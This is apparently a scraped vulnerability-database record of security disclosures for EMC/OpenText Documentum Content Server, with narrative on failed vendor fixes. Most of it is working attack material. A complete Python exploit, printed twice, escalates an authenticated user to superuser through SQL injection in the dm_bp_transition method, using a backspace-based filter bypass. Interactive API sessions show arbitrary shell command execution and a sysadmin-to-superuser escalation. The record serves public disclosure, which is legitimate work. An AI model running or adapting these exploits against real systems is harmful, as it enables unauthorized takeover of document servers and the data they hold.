do_method with\nmethod='dm_bp_transition',arguments='repo repo dmadmin \"\"\n0000000000000000 0000000000000000 0000000000000000 0901d920805929dd\n0000000000000000 0000000000000000 0000000000000000 \"\" 0 0 T F T T\ndmadmin 0000000000000000'\n(1 row affected)\n\n....\n\nAPI> Bye\n~]$ cat /tmp/test\ndm_bp_transition_has_vulnerability\n~]$\n\n==========================================>8========================================\n\nOn July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.\n\nOn November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor \nconstantly fails to provide status of reported vulnerabilities) by providing another proof of concept, \ndescription provided to CERT/CC was:\n\n==========================================8<========================================\nI have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following\nerror:\n\n[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected\nerror: [DM_API_W_NO_MATCH]warning: \"There was no match in the\ndocbase for the qualification: dm_procedure where r_object_id =\n'0801fd08805c9dfe'\"\n\nSuch behaviour means that EMC tried to remediate a security issue by\n\"checking\" object type of supplied object:\n\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\nSession id is s0\nAPI> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'\n...\n[DM_API_W_NO_MATCH]warning: \"There was no match in the docbase for the\nqualification: dm_procedure where r_object_id = '0801fd08805c9dfe'\"\n\nAPI> Bye\n\nbin]$ strings dmbasic| grep dm_procedure\nid,%s,dm_procedure where object_name = '%s' and folder('%s')\nid,%s,dm_procedure where r_object_id = '%s'\n# old version of dmbasic binary\nbin]$ strings dmbasic| grep dm_procedure\nbin]$\n\nSo, the fix was implemented in dmbasic binary, the problem is neither 6.7\nSP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first 
patch\nthat was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the\nissue is still reproducible because introduced check could be bypassed\nusing SQL injection:\n\n~]$ cat test.ebs\nPublic Function EntryCriteria(ByVal SessionId As String,_\nByVal ObjectId As String,_\nByVal UserName As String,_\nByVal TargetState As String,_\nByRef ErrorString As String) As Boolean\nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\")\nEntryCriteria=True\nEnd Function\n~]$ cat /tmp/test\ncat: /tmp/test: No such file or directory\n\n~]$ iapi\nPlease enter a docbase name (docubase): repo\nPlease enter a user (dmadmin): test01\nPlease enter password for test01:\n\n\nEMC Documentum iapi - Interactive API interface\n(c) Copyright EMC Corp., 1992 - 2011\nAll rights reserved.\nClient Library Release 6.7.2190.0142\n\n\nConnecting to Server using docbase repo\n[DM_SESSION_I_SESSION_START]info: \"Session 0101fd088014000c started for\nuser test01.\"\n\n\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\nSession id is s0\nAPI> create,c,dm_sysobject\n...\n0801fd08805c9dfe\nAPI> set,c,l,object_name\nSET> test\n...\nOK\nAPI> setfile,c,l,test.ebs,crtext\n...\nOK\nAPI> save,c,l\n...\nOK\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\n0000000000000000 0000000000000000 0000000000000000 \"\"\n0 0 T F T T dmadmin 0000000000000000'\n\n...\n\n(1 row affected)\n\nAPI> Bye\n~]$ cat /tmp/test\ndm_bp_transition_has_vulnerability\n~]$\n\nHere \"union ...\" allows to bypass check based on \"id\" call:\n\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\nSession id is s0\nAPI> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union\nselect r_object_id from dm_sysobject 
where\nr_object_id='0801fd08805c9dfe'\n...\n0801fd08805c9dfe\nAPI> apply,c,,GET_LAST_SQL\n...\nq0\nAPI> next,c,q0\n...\nOK\nAPI> get,c,q0,result\n...\n\nselect all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where\n((dm_procedure.r_object_id='0801fd08805c9dfe,')) and\n(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)\nunion select all dm_sysobject.r_object_id from dm_sysobject_sp\ndm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))\nand (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)\n\nAPI> close,c,q0\n...\nOK\n\nComma is required to bypass error in fetch call:\nAPI> fetch,c,0801fd08805c9dfe' union select r_object_id from\ndm_sysobject where r_object_id='0801fd08805c9dfe\n...\n[DM_API_E_BADID]error: \"Bad ID given: 0801fd08805c9dfe' union\nselect r_object_id from dm_sysobject where r_object_id=\n'0801fd08805c9dfe\"\n\n\nAPI> fetch,c,0801fd08805c9dfe,' union select r_object_id from\ndm_sysobject where r_object_id='0801fd08805c9dfe\n...\nOK\n==========================================>8========================================\n\nOn August 2015 vendor had undertaken another attempt to remediate this vulnerability\ncheck ESA-2015-131/CVE-2015-4533 for details.\n\nOn August 2015 the fix was contested, check http://seclists.org/bugtraq/2015/Aug/110\nfor detailed description - I just demonstrated another attack vector - using \nUNION ALL keyword instead of UNION:\n\n=================================8<================================\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\n0000000000000000 0000000000000000 0000000000000000 \"\"\n0 0 T F T T dmadmin 0000000000000000'\n\n[DM_METHOD_E_METHOD_ARGS_INVALID]error:\n\"The arguments being passed to the method 'dm_bp_transition' are\ninvalid:\narguments 
contain sql keywords which are not allowed.\"\n\n\nNew attack vector (note ALL keyword):\n\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\n0000000000000000 \"0801fd08805c9dfe,'' union all select r_object_id\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\n0000000000000000 0000000000000000 0000000000000000 \"\"\n0 0 T F T T dmadmin 0000000000000000'\n\n=================================>8================================\n\n\nRecently I have noticed that latest versions of Documentum Content\nServer are not affected by the PoC provided above, however all versions\nof Documentum Content Server are still vulnerable because vendor incorrectly\nimplemented input validation: they convert arguments to lower/upper-case, \nreplace line feed, carriage return and tab characters by a space, \nremove double spaces, after that they check where resulting string contains \nspecial keywords ('union ' and 'union all') or not - it is possible \nto use other whitespace characters like backspace, which is demonstrated\nin the PoC. \n\n\n__\n\nRegards,\nAndrey B. 
Panfilov\n\n\n\nCVE-2017-7221.py\n'''\n\n#!/usr/bin/env python\n\nimport socket\nimport sys\nfrom os.path import basename\n\nfrom dctmpy.docbaseclient import DocbaseClient\nfrom dctmpy.obj.typedobject import TypedObject\n\nCIPHERS = \"ALL:aNULL:!eNULL\"\n\n\ndef usage():\n print \"usage:\\n\\t%s host port user password\" % basename(sys.argv[0])\n\n\ndef main():\n if len(sys.argv) != 5:\n usage()\n exit(1)\n\n (session, docbase) = create_session(*sys.argv[1:5])\n\n if is_super_user(session):\n print \"Current user is a superuser, nothing to do\"\n exit(1)\n\n install_owner = session.serverconfig['r_install_owner']\n document_id = session.next_id(0x08)\n content_id = session.next_id(0x06)\n\n store = session.get_by_qualification(\"dm_store\")\n format = session.get_by_qualification(\"dm_format where name='crtext'\")\n handle = session.make_pusher(store['r_object_id'])\n if handle < 1:\n print \"Unable to create pusher\"\n exit(1)\n\n data = \"Public Function EntryCriteria(ByVal SessionId As String,_\" \\\n \"\\nByVal ObjectId As String,_\" \\\n \"\\nByVal UserName As String,_\" \\\n \"\\nByVal TargetState As String,_\" \\\n \"\\nByRef ErrorString As String) As Boolean\" \\\n \"\\nDim QueryID As String\" \\\n \"\\nDim Query As String\" \\\n \"\\nQuery = \\\"query,c,update dm_user objects set \" \\\n \"user_privileges=16 where user_name=\\'%s\\'\\\"\" \\\n \"\\nQueryID = dmAPIGet(Query)\" \\\n \"\\nQueryID = dmAPIExec(\\\"commit,c\\\")\" \\\n \"\\nEntryCriteria=True\" \\\n \"\\nEnd Function\" % (sys.argv[3])\n\n b = bytearray()\n b.extend(data)\n\n if not session.start_push(handle, content_id, format['r_object_id'], len(b)):\n print \"Failed to start push\"\n exit(1)\n\n session.upload(handle, b)\n data_ticket = session.end_push_v2(handle)['DATA_TICKET']\n\n procedure = False\n try:\n print \"Trying to create dm_procedure\"\n document = TypedObject(session=session)\n document.set_string(\"OBJECT_TYPE\", \"dm_procedure\")\n document.set_bool(\"IS_NEW_OBJECT\", True)\n 
document.set_int(\"i_vstamp\", 0)\n document.set_int(\"world_permit\", 7)\n document.set_string(\"object_name\", \"CVE-2014-2513\")\n document.set_string(\"r_object_type\", \"dm_procedure\")\n document.append_id(\"i_contents_id\", content_id)\n document.set_int(\"r_page_cnt\", 1)\n document.set_string(\"a_content_type\", format['name'])\n document.set_bool(\"i_has_folder\", True)\n document.set_bool(\"i_latest_flag\", True)\n document.set_id(\"i_chronicle_id\", document_id)\n document.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"])\n document.set_int(\"r_content_size\", len(b))\n if session.sys_obj_save(document_id, document):\n procedure = True\n except Exception, e:\n print str(e)\n\n if not procedure:\n print \"Failed to create dm_procedure\"\n print \"Trying to create dm_sysobject\"\n document = TypedObject(session=session)\n document.set_string(\"OBJECT_TYPE\", \"dm_sysobject\")\n document.set_bool(\"IS_NEW_OBJECT\", True)\n document.set_int(\"i_vstamp\", 0)\n document.set_string(\"owner_name\", sys.argv[3])\n document.set_int(\"world_permit\", 7)\n document.set_string(\"object_name\", \"CVE-2017-7221\")\n document.set_string(\"r_object_type\", \"dm_sysobject\")\n document.append_id(\"i_contents_id\", content_id)\n document.set_int(\"r_page_cnt\", 1)\n document.set_string(\"a_content_type\", format['name'])\n document.set_bool(\"i_has_folder\", True)\n document.set_bool(\"i_latest_flag\", True)\n document.set_id(\"i_chronicle_id\", document_id)\n document.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"])\n document.set_int(\"r_content_size\", len(b))\n if not session.sys_obj_save(document_id, document):\n print \"Failed to create dm_sysobject\"\n exit(1)\n\n content = TypedObject(session=session)\n content.set_string(\"OBJECT_TYPE\", \"dmr_content\")\n content.set_bool(\"IS_NEW_OBJECT\", True)\n content.set_id(\"storage_id\", store['r_object_id'])\n content.set_id(\"format\", format['r_object_id'])\n content.set_int(\"data_ticket\", 
data_ticket)\n content.set_id(\"parent_id\", document_id)\n content.set_int(\"page\", 0)\n content.set_string(\"full_format\", format['name'])\n content.set_int(\"content_size\", len(b))\n if not session.save_cont_attrs(content_id, content):\n print \"Failed to create content\"\n exit(1)\n\n if procedure:\n query = \"execute do_method WITH METHOD='dm_bp_transition',\" \\\n \" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\\n \"0000000000000000 0000000000000000 \\\"%s\\\" \" \\\n \"0000000000000000 0000000000000000 0000000000000000 \" \\\n \"\\\"\\\" 0 0 T F T T %s %s'\" % \\\n (docbase, docbase, install_owner, document_id,\n install_owner, session.session)\n else:\n query = \"execute do_method WITH METHOD='dm_bp_transition',\" \\\n \" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\\n \"0000000000000000 0000000000000000 \\\"%s,'' \" \\\n \"union\\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\\\" \" \\\n \"0000000000000000 0000000000000000 0000000000000000 \" \\\n \"\\\"\\\" 0 0 T F T T %s %s'\" % \\\n (docbase, docbase, install_owner, document_id,\n document_id, install_owner, session.session)\n\n session.query(query)\n\n r = session.query(\n \"select user_privileges from dm_user \"\n \"where user_name=USER\") \\\n .next_record()['user_privileges']\n if r != 16:\n print \"Failed\"\n exit(1)\n print \"P0wned!\"\n\n\ndef create_session(host, port, user, pwd, identity=None):\n print \"Trying to connect to %s:%s as %s ...\" % \\\n (host, port, user)\n session = None\n try:\n session = DocbaseClient(\n host=host, port=int(port),\n username=user, password=pwd,\n identity=identity)\n except socket.error, e:\n if e.errno == 54:\n session = DocbaseClient(\n host=host, port=int(port),\n username=user, password=pwd,\n identity=identity,\n secure=True, ciphers=CIPHERS)\n else:\n raise e\n docbase = session.docbaseconfig['object_name']\n version = session.serverconfig['r_server_version']\n print \"Connected to %s:%s, docbase: %s, version: %s\" % \\\n 
(host, port, docbase, version)\n return (session, docbase)\n\n\ndef is_super_user(session):\n user = session.get_by_qualification(\n \"dm_user WHERE user_name=USER\")\n if user['user_privileges'] == 16:\n return True\n group = session.get_by_qualification(\n \"dm_group where group_name='dm_superusers' \"\n \"AND any i_all_users_names=USER\")\n if group is not None:\n return True\n\n return False\n\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-04-25T15:25:34", "description": "", "cvss3": {}, "published": "2017-04-25T00:00:00", "type": "packetstorm", "title": "OpenText Documentum Content Server SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4533", "CVE-2017-7221", "CVE-2014-2513"], "modified": "2017-04-25T00:00:00", "id": "PACKETSTORM:142301", "href": "https://packetstormsecurity.com/files/142301/OpenText-Documentum-Content-Server-SQL-Injection.html", "sourceData": "`#!/usr/bin/env python \n \nimport socket \nimport sys \nfrom os.path import basename \n \nfrom dctmpy.docbaseclient import DocbaseClient \nfrom dctmpy.obj.typedobject import TypedObject \n \nCIPHERS = \"ALL:aNULL:!eNULL\" \n \n \ndef usage(): \nprint \"usage:\\n\\t%s host port user password\" % basename(sys.argv[0]) \n \n \ndef main(): \nif len(sys.argv) != 5: \nusage() \nexit(1) \n \n(session, docbase) = create_session(*sys.argv[1:5]) \n \nif is_super_user(session): \nprint \"Current user is a superuser, nothing to do\" \nexit(1) \n \ninstall_owner = session.serverconfig['r_install_owner'] \ndocument_id = session.next_id(0x08) \ncontent_id = session.next_id(0x06) \n \nstore = session.get_by_qualification(\"dm_store\") \nformat = session.get_by_qualification(\"dm_format where name='crtext'\") \nhandle = session.make_pusher(store['r_object_id']) \nif handle < 1: \nprint \"Unable to create pusher\" \nexit(1) \n \ndata = \"Public Function EntryCriteria(ByVal SessionId As 
String,_\" \\ \n\"\\nByVal ObjectId As String,_\" \\ \n\"\\nByVal UserName As String,_\" \\ \n\"\\nByVal TargetState As String,_\" \\ \n\"\\nByRef ErrorString As String) As Boolean\" \\ \n\"\\nDim QueryID As String\" \\ \n\"\\nDim Query As String\" \\ \n\"\\nQuery = \\\"query,c,update dm_user objects set \" \\ \n\"user_privileges=16 where user_name=\\'%s\\'\\\"\" \\ \n\"\\nQueryID = dmAPIGet(Query)\" \\ \n\"\\nQueryID = dmAPIExec(\\\"commit,c\\\")\" \\ \n\"\\nEntryCriteria=True\" \\ \n\"\\nEnd Function\" % (sys.argv[3]) \n \nb = bytearray() \nb.extend(data) \n \nif not session.start_push(handle, content_id, format['r_object_id'], len(b)): \nprint \"Failed to start push\" \nexit(1) \n \nsession.upload(handle, b) \ndata_ticket = session.end_push_v2(handle)['DATA_TICKET'] \n \nprocedure = False \ntry: \nprint \"Trying to create dm_procedure\" \ndocument = TypedObject(session=session) \ndocument.set_string(\"OBJECT_TYPE\", \"dm_procedure\") \ndocument.set_bool(\"IS_NEW_OBJECT\", True) \ndocument.set_int(\"i_vstamp\", 0) \ndocument.set_int(\"world_permit\", 7) \ndocument.set_string(\"object_name\", \"CVE-2014-2513\") \ndocument.set_string(\"r_object_type\", \"dm_procedure\") \ndocument.append_id(\"i_contents_id\", content_id) \ndocument.set_int(\"r_page_cnt\", 1) \ndocument.set_string(\"a_content_type\", format['name']) \ndocument.set_bool(\"i_has_folder\", True) \ndocument.set_bool(\"i_latest_flag\", True) \ndocument.set_id(\"i_chronicle_id\", document_id) \ndocument.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"]) \ndocument.set_int(\"r_content_size\", len(b)) \nif session.sys_obj_save(document_id, document): \nprocedure = True \nexcept Exception, e: \nprint str(e) \n \nif not procedure: \nprint \"Failed to create dm_procedure\" \nprint \"Trying to create dm_sysobject\" \ndocument = TypedObject(session=session) \ndocument.set_string(\"OBJECT_TYPE\", \"dm_sysobject\") \ndocument.set_bool(\"IS_NEW_OBJECT\", True) \ndocument.set_int(\"i_vstamp\", 0) 
\ndocument.set_string(\"owner_name\", sys.argv[3]) \ndocument.set_int(\"world_permit\", 7) \ndocument.set_string(\"object_name\", \"CVE-2017-7221\") \ndocument.set_string(\"r_object_type\", \"dm_sysobject\") \ndocument.append_id(\"i_contents_id\", content_id) \ndocument.set_int(\"r_page_cnt\", 1) \ndocument.set_string(\"a_content_type\", format['name']) \ndocument.set_bool(\"i_has_folder\", True) \ndocument.set_bool(\"i_latest_flag\", True) \ndocument.set_id(\"i_chronicle_id\", document_id) \ndocument.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"]) \ndocument.set_int(\"r_content_size\", len(b)) \nif not session.sys_obj_save(document_id, document): \nprint \"Failed to create dm_sysobject\" \nexit(1) \n \ncontent = TypedObject(session=session) \ncontent.set_string(\"OBJECT_TYPE\", \"dmr_content\") \ncontent.set_bool(\"IS_NEW_OBJECT\", True) \ncontent.set_id(\"storage_id\", store['r_object_id']) \ncontent.set_id(\"format\", format['r_object_id']) \ncontent.set_int(\"data_ticket\", data_ticket) \ncontent.set_id(\"parent_id\", document_id) \ncontent.set_int(\"page\", 0) \ncontent.set_string(\"full_format\", format['name']) \ncontent.set_int(\"content_size\", len(b)) \nif not session.save_cont_attrs(content_id, content): \nprint \"Failed to create content\" \nexit(1) \n \nif procedure: \nquery = \"execute do_method WITH METHOD='dm_bp_transition',\" \\ \n\" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\ \n\"0000000000000000 0000000000000000 \\\"%s\\\" \" \\ \n\"0000000000000000 0000000000000000 0000000000000000 \" \\ \n\"\\\"\\\" 0 0 T F T T %s %s'\" % \\ \n(docbase, docbase, install_owner, document_id, \ninstall_owner, session.session) \nelse: \nquery = \"execute do_method WITH METHOD='dm_bp_transition',\" \\ \n\" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\ \n\"0000000000000000 0000000000000000 \\\"%s,'' \" \\ \n\"union\\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\\\" \" \\ \n\"0000000000000000 0000000000000000 
0000000000000000 \" \\ \n\"\\\"\\\" 0 0 T F T T %s %s'\" % \\ \n(docbase, docbase, install_owner, document_id, \ndocument_id, install_owner, session.session) \n \nsession.query(query) \n \nr = session.query( \n\"select user_privileges from dm_user \" \n\"where user_name=USER\") \\ \n.next_record()['user_privileges'] \nif r != 16: \nprint \"Failed\" \nexit(1) \nprint \"P0wned!\" \n \n \ndef create_session(host, port, user, pwd, identity=None): \nprint \"Trying to connect to %s:%s as %s ...\" % \\ \n(host, port, user) \nsession = None \ntry: \nsession = DocbaseClient( \nhost=host, port=int(port), \nusername=user, password=pwd, \nidentity=identity) \nexcept socket.error, e: \nif e.errno == 54: \nsession = DocbaseClient( \nhost=host, port=int(port), \nusername=user, password=pwd, \nidentity=identity, \nsecure=True, ciphers=CIPHERS) \nelse: \nraise e \ndocbase = session.docbaseconfig['object_name'] \nversion = session.serverconfig['r_server_version'] \nprint \"Connected to %s:%s, docbase: %s, version: %s\" % \\ \n(host, port, docbase, version) \nreturn (session, docbase) \n \n \ndef is_super_user(session): \nuser = session.get_by_qualification( \n\"dm_user WHERE user_name=USER\") \nif user['user_privileges'] == 16: \nreturn True \ngroup = session.get_by_qualification( \n\"dm_group where group_name='dm_superusers' \" \n\"AND any i_all_users_names=USER\") \nif group is not None: \nreturn True \n \nreturn False \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142301/CVE-2017-7221.py.txt"}, {"lastseen": "2016-12-05T22:14:32", "description": "", "cvss3": {}, "published": "2015-08-18T00:00:00", "type": "packetstorm", "title": "EMC Documentum Content Server Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4531", "CVE-2011-4144", "CVE-2014-4622"], "modified": 
"2015-08-18T00:00:00", "id": "PACKETSTORM:133143", "href": "https://packetstormsecurity.com/files/133143/EMC-Documentum-Content-Server-Privilege-Escalation.html", "sourceData": "`Product: EMC Documentum Content Server \nVendor: EMC \nVersion: ANY \nCVE: N/A \nRisk: High \nStatus: public/not fixed \n \nIn 2011 Yuri Simone discovered a security flaw in EMC Documentum Content \nServer, which allows users with sysadmin privileges to elevate their \nprivileges to superuser (see CVE-2011-4144). On April 2014 I discovered \nanother set of vulnerabilities related to CVE-2011-4144 (see attached \nVRF#HUDHKNW4.txt). On September 2014 vendor announced a fix (see \nCVE-2014-4622) for the first only vulnerability from VRF#HUDHKNW4.txt (check \nrow 5 in CERT's spreadsheet for VU#315340 \n(http://www.kb.cert.org/vuls/id/315340)). Yesterday vendor announced a new \nfix (see CVE-2015-4531) related to VRF#HUDHKNW4.txt. Besides the fact that \nCVE-2015-4531 has a completely wrong description, CVE-2015-4531 does not \nintroduce any security fixes. I believe that there are about a dozen of \noptions to elevate privileges from sysadmin to superuser, but I'm going to \ndescribe the most obvious one. \n \n1. If attacker is able to create (or modify) docbase method (object with \ndm_method type) he is able to elevate his privileges through executing this \nmethod, example: \n \ncat > test.ebs \nConst CONNECTION_ERROR As Integer = 33 \n \nSub rmain(d As String, u As String, g As String) \ns$ = dmAPIGet(\"connect,\" & d & \",\" & u & \",\") \n \nIf s = \"\" Then \ndmExit(CONNECTION_ERROR) \nEnd If \n \nq$ = \"update dm_user objects\" & _ \n\" set user_privileges=16\" & _ \n\" where user_name='\" & g & \"'\" \n \ns=dmAPIExec(\"execquery,\" & s & \",T,\" & q) \n \nEnd Sub \n \n \nAPI> create,c,dm_method \n... \n10024be98001f92d \nAPI> set,c,l,object_name \nSET> test \n... \nOK \nAPI> setfile,c,l,test.ebs,crtext \n... \nOK \nAPI> set,c,l,method_verb \nSET> ./dmbasic -ermain \n... 
\nOK \nAPI> set,c,l,run_as_server \nSET> T \n... \nOK \nAPI> set,c,l,use_method_content \nSET> T \n... \nOK \nAPI> set,c,l,method_type \nSET> dmbasic \n... \nOK \nAPI> save,c,l \n... \nOK \nAPI> retrieve,c,dm_user where user_name='test' \n... \n11024be980000e8a \nAPI> get,c,l,user_privileges \n... \n0 \nAPI> apply,c,,DO_METHOD,METHOD,S,test, \nARGUMENTS,S,'repo dmadmin test' \n... \nq0 \nAPI> retrieve,c,dm_user where user_name='test' \n... \n11024be980000e8a \nAPI> get,c,l,user_privileges \n... \n16 \n \n2. for the reason mentioned above regular users are unable to create or \nmodify docbase methods: \n \nAPI> create,c,dm_method \n... \n10024be98001f954 \nAPI> save,c,l \n... \n[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: \"The current user (test) \nneeds to have superuser or sysadmin privilege to save or destroy \ndm_method object.\" \n \n3. But sysadmins were able to create docbase methods. Now if sysadmin tries \nto create docbase method it gets following error: \n \nAPI> create,c,dm_method \n... \n10024be98001f968 \nAPI> set,c,l,object_name \nSET> test1 \n... \nOK \nAPI> setfile,c,l,test.ebs,crtext \n... \nOK \nAPI> set,c,l,method_verb \nSET> ./dmbasic -ermain \n... \nOK \nAPI> save,c,l \n... \n[DM_SYSOBJECT_E_LINK_PERMIT2]error: \"Linking or unlinking to the folder \n'/System/Methods' failed on sysobject '10024be98001f968'. \nWRITE permit is required on the folder, when using folder security.\" \n \n4. So, it is obvious that remediation provided by vendor relies on ACL \nrestrictions for /System/Methods folder, the problem is vendor does not take \ninto account that Content Server has a set of groups which allow to bypass \nACL restrictions and are still manageable by sysadmin users, example: \n \nAPI> ?,c,alter group dm_escalated_write add testadmin \n \nAPI> create,c,dm_method \n... \n10024be98001f969 \nAPI> set,c,l,object_name \nSET> test1 \n... \nOK \nAPI> setfile,c,l,test.ebs,crtext \n... \nOK \nAPI> set,c,l,method_verb \nSET> ./dmbasic -ermain \n... 
\nOK \nAPI> save,c,l \n... \nOK \n \n \n \n__ \nRegards, \nAndrey B. Panfilov \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133143/emcdcs-escalate.txt"}, {"lastseen": "2016-12-05T22:17:10", "description": "", "cvss3": {}, "published": "2015-08-18T00:00:00", "type": "packetstorm", "title": "EMC Documentum Content Server Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4532"], "modified": "2015-08-18T00:00:00", "id": "PACKETSTORM:133144", "href": "https://packetstormsecurity.com/files/133144/EMC-Documentum-Content-Server-Code-Execution.html", "sourceData": "`Product: EMC Documentum Content Server \nVendor: EMC \nVersion: ANY \nCVE: N/A \nRisk: High \nStatus: public/not fixed \n \nFor detailed description see http://seclists.org/bugtraq/2015/Jul/51 \n \nNew behavior introduced in CVE-2015-4532: \n \nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' \nrepo repo dmadmin \"\" 0000000000000000 0000000000000000 \n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id \nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\" \n0000000000000000 0000000000000000 0000000000000000 \"\" \n0 0 T F T T dmadmin 0000000000000000' \n \n[DM_METHOD_E_METHOD_ARGS_INVALID]error: \n\"The arguments being passed to the method 'dm_bp_transition' are \ninvalid: \narguments contain sql keywords which are not allowed.\" \n \n \nNew attack vector (note ALL keyword): \n \nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' \nrepo repo dmadmin \"\" 0000000000000000 0000000000000000 \n0000000000000000 \"0801fd08805c9dfe,'' union all select r_object_id \nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\" \n0000000000000000 0000000000000000 0000000000000000 \"\" \n0 0 T F T T dmadmin 0000000000000000' \n \n__ \nRegards, \nAndrey B. 
Panfilov \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133144/emcdcs-exec.txt"}, {"lastseen": "2016-12-05T22:15:29", "description": "", "cvss3": {}, "published": "2015-07-09T00:00:00", "type": "packetstorm", "title": "EMC Documentum Content Server CVE-2014-2513 Bad Fix", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-2513"], "modified": "2015-07-09T00:00:00", "id": "PACKETSTORM:132628", "href": "https://packetstormsecurity.com/files/132628/EMC-Documentum-Content-Server-CVE-2014-2513-Bad-Fix.html", "sourceData": "`Product: EMC Documentum Content Server \nVendor: EMC \nVersion: ANY \nCVE: N/A \nRisk: High \nStatus: public/not fixed \n \nOn November 2013 I discovered vulnerability in EMC Documentum Content Server \nwhich allow authenticated user to execute arbitrary commands using \ndm_bp_transition docbase method (for detailed description see \nVRF#HUFPRMOP.txt). \n \nOn July 2014 vendor announced ESA-2014-064 which was claiming that \nvulnerability has been remediated. 
\n \nOn November 2014 fix was contested (there was significant delay after \nESA-2014-064 because vendor constantly fails to provide status of reported \nvulnerabilities) by providing another proof of concept, description provided \nto CERT/CC (another CNA was chosen because vendor fails to communicate) was: \n \n=================================8<================================ \nI have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following \nerror: \n \n[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected \nerror: [DM_API_W_NO_MATCH]warning: \"There was no match in the \ndocbase for the qualification: dm_procedure where r_object_id = \n'0801fd08805c9dfe'\" \n \nSuch behaviour means that EMC tried to remediate a security issue by \n\u201cchecking\u201d object type of supplied object: \n \nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle \nSession id is s0 \nAPI> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe' \n... \n[DM_API_W_NO_MATCH]warning: \"There was no match in the docbase for the \nqualification: dm_procedure where r_object_id = '0801fd08805c9dfe'\" \n \nAPI> Bye \n \nbin]$ strings dmbasic| grep dm_procedure \nid,%s,dm_procedure where object_name = '%s' and folder('%s') \nid,%s,dm_procedure where r_object_id = '%s' \n# old version of dmbasic binary \nbin]$ strings dmbasic| grep dm_procedure \nbin]$ \n \nSo, the fix was implemented in dmbasic binary, the problem is neither 6.7 \nSP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch \nthat was shipped with dmbasic binary was 6.7SP2 P17. 
Moreover, the \nissue is still reproducible because introduced check could be bypassed \nusing SQL injection: \n \n~]$ cat test.ebs \nPublic Function EntryCriteria(ByVal SessionId As String,_ \nByVal ObjectId As String,_ \nByVal UserName As String,_ \nByVal TargetState As String,_ \nByRef ErrorString As String) As Boolean \nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\") \nEntryCriteria=True \nEnd Function \n~]$ cat /tmp/test \ncat: /tmp/test: No such file or directory \n \n~]$ iapi \nPlease enter a docbase name (docubase): repo \nPlease enter a user (dmadmin): test01 \nPlease enter password for test01: \n \n \nEMC Documentum iapi - Interactive API interface \n(c) Copyright EMC Corp., 1992 - 2011 \nAll rights reserved. \nClient Library Release 6.7.2190.0142 \n \n \nConnecting to Server using docbase repo \n[DM_SESSION_I_SESSION_START]info: \"Session 0101fd088014000c started for \nuser test01.\" \n \n \nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle 